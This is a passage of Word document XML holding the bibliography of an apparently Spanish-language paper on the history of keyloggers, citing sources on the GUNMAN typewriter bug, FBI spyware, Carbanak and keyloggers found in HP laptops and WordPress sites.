                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Crypto Museum, «IBM Selectric Bug. Operation GUNMAN - how the Soviets bugged IBM typewriters,» [En línea]. Available: https://www.cryptomuseum.com/covert/bugs/selectric/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[3] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Center for Cryptologic History, National Security Agency, «Learning from the Enemy: The GUNMAN Project,» 2012. [En línea]. Available: http://www.foo.be/docs/intelligence/Learning_From_the_Enemy_The_GUNMAN_Project.pdf.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[4] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>S. A. Maneki, «(U) Learning from the Enemy: The GUNMAN Project.,» 8 Enero 2007. [En línea]. Available: https://www.nsa.gov/Portals/70/documents/news-features/declassified-documents/cryptologic-histories/Learning_from_the_Enemy.pdf.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[5] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Perry Kivolowitz,» [En línea]. Available: http://pages.cs.wisc.edu/~perryk/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[6] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Codigo fuente del primer keylogger basado en Software. The 'Security Digest' Archives (TM). DOCUMENT: Unix 'Security Mailing List',» 17 Noviembre 1983. [En línea]. Available: http://securitydigest.org/unix/archive/006.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[7] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«La historia (que se conoce) de los ataques informáticos realizados por el FBI,» 18 Mayo 2016. [En línea]. Available: https://r3d.mx/2016/05/18/la-historia-que-se-conoce-de-los-ataques-informaticos-realizados-por-el-fbi/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[8] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>N. E. Carrell, «SPYING ON THE MOB: UNITED STA TES V. SCARFO - A CONSTITUTIONAL ANALYSIS,» 10 2013. [En línea]. Available: http://illinoisjltp.com/journal/wp-content/uploads/2013/10/Carrell.pdf.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[9] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>B. Sullivan, «FBI software cracks encryption wall,» 2001 Noviembre 2001. [En línea]. Available: www.nbcnews.com/id/3341694/ns/technology_and_science-security/t/fbi-software-cracks-encryption-wall/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[10] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>C. W. &amp;. M. So, «THE CASE FOR MAGIC LANTERN: SEPTEMBER 11 HIGHLIGHTS THE NEED FOR INCREASED SURVEILLANCE,» 2002. [En línea]. Available: http://jolt.law.harvard.edu/articles/pdf/v15/15HarvJLTech521.pdf.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[11] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>J. Lynch, «New FBI Documents Provide Details on Government’s Surveillance Spyware,» 29 Abril 2011. [En línea]. Available: https://www.eff.org/es/deeplinks/2011/04/new-fbi-documents-show-depth-government.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[12] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Boston College Student Steals Around $2,000 with Keylogger,» 7 Febrero 2003. [En línea]. Available: https://www.neowin.net/news/boston-college-student-steals-around-2000-with-keylogger.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[13] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>The Guardian, «'Sleeper bugs' used to steal €1m in France,» 07 Febrero 2006. [En línea]. Available: https://www.theguardian.com/technology/2006/feb/07/news.france.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[14] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>CHINAdaily, «Police: Hackers stole Israeli defense data,» 04 Junio 2005. [En línea]. Available: http://www.chinadaily.com.cn/english/doc/2005-06/04/content_448599.htm.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[15] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>El Mundo, «Escándalo en Israel por varios casos de espionaje industrial mediante virus,» 31 Mayo 2005. [En línea]. Available: https://www.elmundo.es/navegante/2005/05/30/empresas/1117448921.html.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[16] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Perfil de LinkedIn de Michael Haephrati. Target Eye Limited.,» [En línea]. Available: https://www.linkedin.com/in/haephrati/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[17] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Hao Chen, Professor, Department of Computer Science, University of California, Davis,» [En línea]. Available: https://web.cs.ucdavis.edu/~hchen/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[18] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>H. Chen, «TouchLogger: Inferring Keystrokes On Touch Screen From Smartphone Motion,» 2011. [En línea]. Available: https://web.cs.ucdavis.edu/~hchen/paper/hotsec2011.pdf.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[19] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Kaspersky, «El mayor atraco del siglo: los ciberdelincuentes roban mil millones de dólares,» 16 Febrero 2015. [En línea]. Available: https://www.kaspersky.es/blog/el-mayor-atraco-del-siglo-los-hackers-roban-mil-millones-de-dolares/5370/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[20] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Kaspersky, «The Great Bank Robbery: the Carbanak APT,» 16 Febrero 2015. [En línea]. Available: https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[21] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>A. Segura, «Análisis del código fuente de Carbanak,» 24 Abril 2019. [En línea]. Available: https://unaaldia.hispasec.com/2019/04/analisis-del-codigo-fuente-de-carbanak.html.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[22] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">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23] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">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DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[24] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>C. Forrest, «Built-in keylogger found in HP laptops...again,» 11 Diciembre 2017. [En línea]. Available: https://www.techrepublic.com/article/built-in-keylogger-found-in-hp-laptops-again/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[25] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>M. Myng, «Synaptics/HP keylogger,» 07 Diciembre 2017. [En línea]. Available: https://zwclose.github.io/HP-keylogger/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[26] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Microsoft, «WPP Software Tracing,» 20 Abril 2017. [En línea]. Available: https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/wpp-software-tracing.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[27] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>SUCURI, «Cloudflare[.]Solutions Keylogger on Thousands of Infected WordPress Sites,» 6 Diciembre 2017. [En línea]. Available: https://blog.sucuri.net/2017/12/cloudflare-solutions-keylogger-on-thousands-of-infected-wordpress-sites.html.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[28] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>SUCURI, «Cloudflare[.]solutions Keylogger Returns on New Domains,» 24 Enero 2018. [En línea]. Available: https://blog.sucuri.net/2018/01/cloudflare-solutions-keylogger-returns-on-new-domains.html.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
